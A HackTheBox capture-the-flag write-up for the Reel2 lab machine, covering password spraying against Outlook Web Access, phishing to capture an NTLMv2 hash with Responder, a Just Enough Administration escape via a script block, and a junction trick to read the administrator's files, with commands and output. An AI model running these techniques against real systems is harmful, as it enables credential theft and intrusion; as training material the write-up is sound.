HackTheBox -Reel2

Posted on Sat, Mar 13, 2021 HackTheBox Writeup Password Spraying Phishing Bypass JEA APK

Info Card :

0x1 - Recon

0x1.1 - Port scanning

Masscan port scan :

sudo masscan -p1-65535,U:1-65535 10.129.49.89 --rate=10000 -e tun0
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-06-06 13:12:52 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]

Discovered open port 6010/tcp on 10.129.49.89
Discovered open port 6017/tcp on 10.129.49.89
Discovered open port 80/tcp on 10.129.49.89
Discovered open port 6012/tcp on 10.129.49.89
Discovered open port 6006/tcp on 10.129.49.89
Discovered open port 6004/tcp on 10.129.49.89
Discovered open port 6011/tcp on 10.129.49.89
Discovered open port 443/tcp on 10.129.49.89
Discovered open port 6005/tcp on 10.129.49.89
Discovered open port 6002/tcp on 10.129.49.89
Discovered open port 6001/tcp on 10.129.49.89
Discovered open port 8080/tcp on 10.129.49.89
Discovered open port 6167/tcp on 10.129.49.89
Discovered open port 5985/tcp on 10.129.49.89
Discovered open port 6007/tcp on 10.129.49.89

Nmap port scan :

nmap -sCV -v -T4 -p 80,443,6001,6002,6004,6005,6006,6007,8080 
reel2.htb -oN reel2.nmap -Pn

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp  open  ssl/https?
| ssl-cert: Subject: commonName=Reel2
| Subject Alternative Name: DNS:Reel2, DNS:Reel2.htb.local
| Issuer: commonName=Reel2
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-07-30T10:12:46
| Not valid after:  2025-07-30T10:12:46
| MD5:   aa49 5cac 7115 c7fe 0628 2a6b 0124 37c4
|_SHA-1: d7ea 2696 a56f 09cb 24ce 557f 830e 86ec 5f63 0f2d
|_ssl-date: 2021-06-06T13:20:21+00:00; +5s from scanner time.
6001/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open  msrpc      Microsoft Windows RPC
6006/tcp open  msrpc      Microsoft Windows RPC
6007/tcp open  msrpc      Microsoft Windows RPC
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
|_http-title: Welcome | Wallstant
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4s

0x3 - Web serber enumeration

On port 443 we find an IIS (Internet Information Services) web server

On port 80 we dont have access ( Forbidden)

0x3.1 - Fuzzing Web directories

I will use the gobuster tool to fuzz the web directories to find directories we don't know exist

gobuster dir -u https://reel2.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
-x php,sql,txt -k -t 64
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://reel2.htb/
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,sql,txt
[+] Timeout:                 10s
===============================================================
2021/06/06 15:28:14 Starting gobuster in directory enumeration mode
===============================================================
/public               (Status: 302) [Size: 144] [--> https://reel2.htb/owa]
/exchange             (Status: 302) [Size: 144] [--> https://reel2.htb/owa]
/Public               (Status: 302) [Size: 144] [--> https://reel2.htb/owa]
/rpc                  (Status: 401) [Size: 13]
/owa                  (Status: 301) [Size: 0] [--> /owa/]
/Exchange             (Status: 302) [Size: 144] [--> https://reel2.htb/owa]
/ecp                  (Status: 301) [Size: 145] [--> https://reel2.htb/ecp/]
/RPC                  (Status: 401) [Size: 13]
/ews                  (Status: 301) [Size: 145] [--> https://reel2.htb/ews/]
/PUBLIC               (Status: 302) [Size: 144] [--> https://reel2.htb/owa]
/exchweb              (Status: 302) [Size: 144] [--> https://reel2.htb/owa]

We can see a /owa that an Outlook Web Access

So we're waiting on the owa login page, maybe this can help us later by getting some credentials

Continue our enumeration on port 8080

0x3.2 Recon on port 8080

On port 8080 we find a page where you can connect and register

Let's create an account and see what happens

0x3.3 Grapping users and Passwords

After registration we are redirected to the /home page

we can identify users on /search

you can get all user using this command : 

curl http://reel2.htb:8080/search | grep user_follow_box_a | grep -oP '<p>(.*?</span)' | sed 's/<p>//g' | sed 's/<p>//g' | sed "s/<br><span style='color:gray;'>@//g" | sed 's/<\/span//g'

We are going to put it in a file to save it

But something is wrong, the users have spaces between them and to access an owa you don't need one, you could combine the first and last names of the users so that it is correct and we could possibly bruteforce it.

This can be done with a good script or simply by hand with the same result

By looking at some users' posts we can generate a wordlist from variants of these words.

Keyword : 
fika
2020
summer
hot

I would recommend taking words from rockyou.txt in case our theory is not correct

grep summer /usr/share/wordlists/rockyou.txt ; grep fika /usr/share/wordlists/rockyou.txt

And we can put them at the end of our wordlist

0x4 - Intrusion in OWA

0x4.1 - Bruteforcing OWA

We can use sprayingtoolkit to try to bruteforce owa

https://github.com/byt3bl33d3r/SprayingToolkit

byt3bl33d3r/SprayingToolkit

A set of Python scripts/utilities that tries to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient. Come hang out on Discord!

https://github.com/byt3bl33d3r/SprayingToolkit

git clone https://github.com/byt3bl33d3r/SprayingToolkit
cd SprayingToolkit/
sudo -H pip3 install -r requirements.txt
python3 atomizer.py owa reel2.htb ../wordlist.txt ../user.txt --interval 0:00:01
[*] Trying to find autodiscover URL
[+] Using OWA autodiscover URL: https://reel2.htb/autodiscover/autodiscover.xml
[+] OWA domain appears to be hosted internally
[+] Got internal domain name using OWA: HTB
[*] Starting spray at 2021-06-06 14:40:43 UTC
[+] Found credentials: s.svensson:Summer2020
[+] Dumped 1 valid accounts to owa_valid_accounts.txt

We can already stop our bruteforce because we managed to find valid credentials !

[+] Found credentials: s.svensson:Summer2020

And we can login in OWA

0x5 - Foothold

0x5.1 - Phishing

You can find all user here and (right click to send a mail)

https://reel2.htb/owa/?ae=Dialog&t=AddressBook

We will try to send a fake email that contains an "important document" that will redirect to our IP address in order to take the netntlmv2 hash of a user

I used responder to steal the hash

SpiderLabs/Responder

⛔ [DEPRECATED] Active at https://github.com/lgandx/Responder LLMNR/NBT-NS/mDNS Poisoner Author: Laurent Gaffie http://www.spiderlabs.com Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB.

https://github.com/SpiderLabs/Responder

sudo responder -I tun0

And we got netNTMLv2 hash from htb\k.svensson

[HTTP] NTLMv2 Client   : 10.129.49.89
[HTTP] NTLMv2 Username : htb\k.svensson
[HTTP] NTLMv2 Hash     : k.svensson::htb:71015fa9e0cdd20c:8D89CCB4BC1AFF4DB9238A587A820CDA:0101000000000000C816916DE75AD701C94A135A134FD8C800000000020008005A004D0053004B0001001E00570049004E002D0036005A00330046004700380038004500450045003900040014005A004D0053004B002E004C004F00430041004C0003003400570049004E002D0036005A003300460047003800380045004500450039002E005A004D0053004B002E004C004F00430041004C00050014005A004D0053004B002E004C004F00430041004C0008003000300000000000000000000000004000008DB300616AB25678FBC18A1420D28D583C5D7457D086FA420F23353B1E2D6AB20A001000000000000000000000000000000000000900200048005400540050002F00310030002E00310030002E00310034002E00390030000000000000000000

We will try to crack it with john

And it worked, so we have the password of k.svensson

User : k.svensson
Pass : kittycat1

0x5.2 - Make a PSSesion to have a shell

Failing to use Evil-WinRM to access the box, switching to powershell on linux

And make PSSesion to access on the target machine

Here is microsoft docs to creates new PSSession

New-PSSession (Microsoft.PowerShell.Core) - PowerShell

The New-PSSession cmdlet creates a PowerShell session (PSSession) on a local or remote computer. When you create a PSSession, PowerShell establishes a persistent connection to the remote computer. Use a PSSession to run multiple commands that share data, such as a function or the value of a variable.

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.1

sudo apt install gss-ntlmssp
sudo apt install pwsh

We have a shell on the machine but watching we have the right to not execute anything a simple "whoami" did not work

0x7 - Bypass JEA restriction

What is JEA ?

Overview of Just Enough Administration (JEA) - PowerShell

Just Enough Administration (JEA) is a security technology that enables delegated administration for anything managed by PowerShell. With JEA, you can: Reduce the number of administrators on your machines using virtual accounts or group-managed service accounts to perform privileged actions on behalf of regular users.

https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/jea/overview?view=powershell-7.1

JEA is a security technology that enables delegated administration for anything managed by PowerShell, with JEA, a system administrator can:

about Language Modes - PowerShell

Explains language modes and their effect on PowerShell sessions. The language mode of a PowerShell session determines, in part, which elements of the PowerShell language can be used in the session. PowerShell supports the following language modes: FullLanguage ConstrainedLanguage (introduced in PowerShell 3.0) RestrictedLanguage NoLanguage The language mode determines the language elements that are permitted in the session.

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_language_modes?view=powershell-7.1

According to the restricted language documentation, "All elements of the PowerShell scripting language are allowed." So we can try to create a function with commands

function default { whoami }
Scriptblocks - PowerShell - SS64.com

A ScriptBlock is a collection of statements surrounded with { curly parenthesesa scriptblock can be saved in a variable and executed using the & call operator Example $alert = { "Hello World" } & $alert & $alert Notice that to execute a ScriptBlock you must use the call operator "&", just defining the ScriptBlock is not enough.

https://ss64.com/ps/syntax-scriptblock.html

But we can also bypass via the powershell script block

& { whoami }

POC :

So we can get user flag !

0x7.2 - Escaping from JEA

We will import the windows executable of netcat on the machine and run it

0x8 - Lateral Privilege Escalation

Now that we have a rather stable shell we will be able to privesc without too much trouble

First of all we can find two files : a capability file and a configuration file

We can also see that sticky notes is installed on the machine

The .psrc extension is a PowerShell data file that lists all the cmdlets, functions, providers, and external programs

The .pssc is a powershell session configuration 

type jea_test_account.pssc
@{
SchemaVersion = '2.0.0.0'
GUID = 'd6a39756-aa53-4ef6-a74b-37c6a80fd796'
Author = 'cube0x0'
SessionType = 'RestrictedRemoteServer'
RunAsVirtualAccount = $true
RoleDefinitions = @{
    'htb\jea_test_account' = @{
        'RoleCapabilities' = 'jea_test_account' } }
LanguageMode = 'NoLanguage'

}

The configuration includes RunAsVirtualAccount, which represents the role defined htb\jea_test_account will have management functions. We see that the session is in progress NoLanguage mode, which means that we cannot use the previous solution.

type jea_test_account.psrc
@{
GUID = '08c0fdac-36ef-43b5-931f-68171c4c8200'
Author = 'cube0x0'
CompanyName = 'Unknown'
Copyright = '(c) 2020 cube0x0. All rights reserved.'
FunctionDefinitions = @{
    'Name' = 'Check-File'
    'ScriptBlock' = {param($Path,$ComputerName=$env:COMPUTERNAME)
 [bool]$Check=$Path -like "D:\*" -or $Path -like "C:\ProgramData\*" ;
 if($check) {get-content $Path}} }
}

This indicates that the custom Check-File function has been defined, which allows the user jea_test_account reads the plain text content of the files in the D: or C:\ProgramData drive folder and its subfolders. C:\ProgramData folder and subfolders. Assuming that the name of the JPO configuration file is also The ConfigurationName of the JEA policy.

I would say that I have to find the password of jea_test_account for PS Remoting.

Remember a sticky note shortcut was present in the documents maybe by looking at the user notes we could find something interesting

General path of sticky notes is : C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb\

dir "C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb\"

 Volume in drive C has no label.
 Volume Serial Number is B3B4-3B84

 Directory of C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb

06/06/2021  03:12 PM    <DIR>          .
06/06/2021  03:12 PM    <DIR>          ..
06/06/2021  03:12 PM             2,845 000003.log
07/30/2020  01:19 PM                16 CURRENT
07/30/2020  01:19 PM                 0 LOCK
06/06/2021  03:12 PM               182 LOG
02/18/2021  08:17 PM               182 LOG.old
07/30/2020  01:19 PM                41 MANIFEST-000001
               6 File(s)          3,266 bytes
               2 Dir(s)   9,251,512,320 bytes free

We find a file "000003.log" in order to be able to read its displayable content we will put it on our local machine

strings 000003.log
VERSION
META:app://.
_app://.
__storejs__test__Z
META:app://.
_app://.
{"first":"<p>Credentials for JEA</p><p>jea_test_account:[email protected]^%@#1</p>
","back":"rgb(255, 242, 171)","title":"rgb(255, 235, 129)","wid":"350","hei":"375",
"deleted":
"no","closed":"yes","locked":"no"}

Fortunately for us someone left the password of jea_test_account we can now create a New PSSession

jea_test_account:[email protected]^%@#1

Now we will be able to create a symbolic link between C:\Users\Administrator\Desktop to C:\ProgramData\

C:\ProgramData>mklink /J default C:\Users\Administrator
mklink /J default C:\Users\Administrator
Junction created for default <<===>> C:\Users\Administrator

Make new PSSession

and Check-File root.txt in our symlink

Reel2 has been pwned !